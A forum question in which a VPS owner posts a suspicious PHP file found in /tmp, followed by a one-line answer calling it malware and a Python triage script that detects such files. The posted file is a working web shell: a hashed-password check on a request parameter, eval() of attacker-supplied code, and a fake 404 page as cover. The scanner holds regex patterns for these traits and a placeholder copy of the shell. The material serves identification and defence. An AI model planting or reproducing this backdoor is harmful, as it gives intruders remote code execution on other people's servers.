
I have a VPS, on which I install a few web applications. All of them are open source applications. Recently my VPS load has been very high, so I checked my daily process log and one thing stood out to me.

Yes, the mysterious //tmp/cbmew.php. I googled cbmew.php and I didn't find anything at all. This is extremely weird as I am using all open source frameworks, so I should be able to find this on the net, no?

Any idea what file this can be?

Here's the content:

<?php
@set_time_limit(0);
@error_reporting(NULL);
@ini_set('display_errors',0);
@ignore_user_abort(TRUE);

if(md5(md5($_REQUEST['psbt']))=='5aa0c942ede6e22dc5a379d86f28037f' and $_REQUEST['mjdu']!=NULL)
{
    $_REQUEST['mjdu']=str_replace('\\"','"',$_REQUEST['mjdu']);
    $_REQUEST['mjdu']=str_replace("\\'","'",$_REQUEST['mjdu']);
    eval($_REQUEST['mjdu']);
    die();
    exit();
}
else
{
    echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL '.$_SERVER['PHP_SELF'].' was not found on this server </p><p>Additionally, a 404 Not Found error was encountered while trying to use an Error Document to handle the request</p></body ></html >';die();exit();
}
?>
Graviton

1 Answer

OK, after some googling, I can be sure that this is malware.

Graviton
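The traits that mark the quoted file as a web shell can be checked for mechanically. The following is an added example, not part of the original question or answer: a static triage script that looks for request input passed to `eval()`, a hashed-password gate on a request parameter, a hard-coded 404 page, and `@`-suppressed runtime settings. The indicator names, function names, sample strings and the list of world-writable directories are assumptions of this example.

```python
import re
from pathlib import Path

# Static indicators modelled on the traits visible in the file quoted in the question.
INDICATORS = {
    "eval_of_request_input": re.compile(
        r"\b(?:eval|assert)\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\b", re.I),
    "hash_gate_on_request_param": re.compile(
        r"(?:md5|sha1)\s*\([^;]*\$_(?:REQUEST|GET|POST|COOKIE)[^;]*"
        r"[=!]=+\s*['\"][0-9a-f]{32,40}['\"]", re.I | re.S),
    "hardcoded_404_body": re.compile(r"\becho\b[^;]*404 Not Found", re.I | re.S),
    "error_suppression": re.compile(
        r"@\s*(?:error_reporting|ini_set|set_time_limit|ignore_user_abort)\s*\(", re.I),
}

def triage(php_source):
    """Return the sorted names of the indicators present in one PHP source string."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(php_source))

def is_suspect(hits):
    # Request input reaching eval() is enough on its own; otherwise require two traits.
    return "eval_of_request_input" in hits or len(hits) >= 2

def scan(roots=("/tmp", "/var/tmp", "/dev/shm")):
    """Yield (path, hits) for suspect .php files under world-writable directories."""
    for root in roots:
        for path in Path(root).rglob("*.php"):
            try:
                hits = triage(path.read_text(errors="replace"))
            except OSError:
                continue  # unreadable entry, or a directory named *.php
            if is_suspect(hits):
                yield str(path), hits

# Constructed sample: same structure as the quoted file, placeholder names and hash.
SAMPLE = r"""<?php
@error_reporting(NULL);
if (md5(md5($_REQUEST['k'])) == '00000000000000000000000000000000' and $_REQUEST['c'] != NULL) {
    eval($_REQUEST['c']);
} else {
    echo '<html><head><title>404 Not Found</title></head></html>';
}
"""
BENIGN = "<?php http_response_code(404); echo 'Page missing'; ?>"  # constructed

if __name__ == "__main__":
    print(triage(SAMPLE))
    for found_path, found_hits in scan():
        print(found_path, found_hits)
```

A hit is a reason to inspect the file, the process that wrote it and the web server access log around its creation time; a clean result does not show the host is clean.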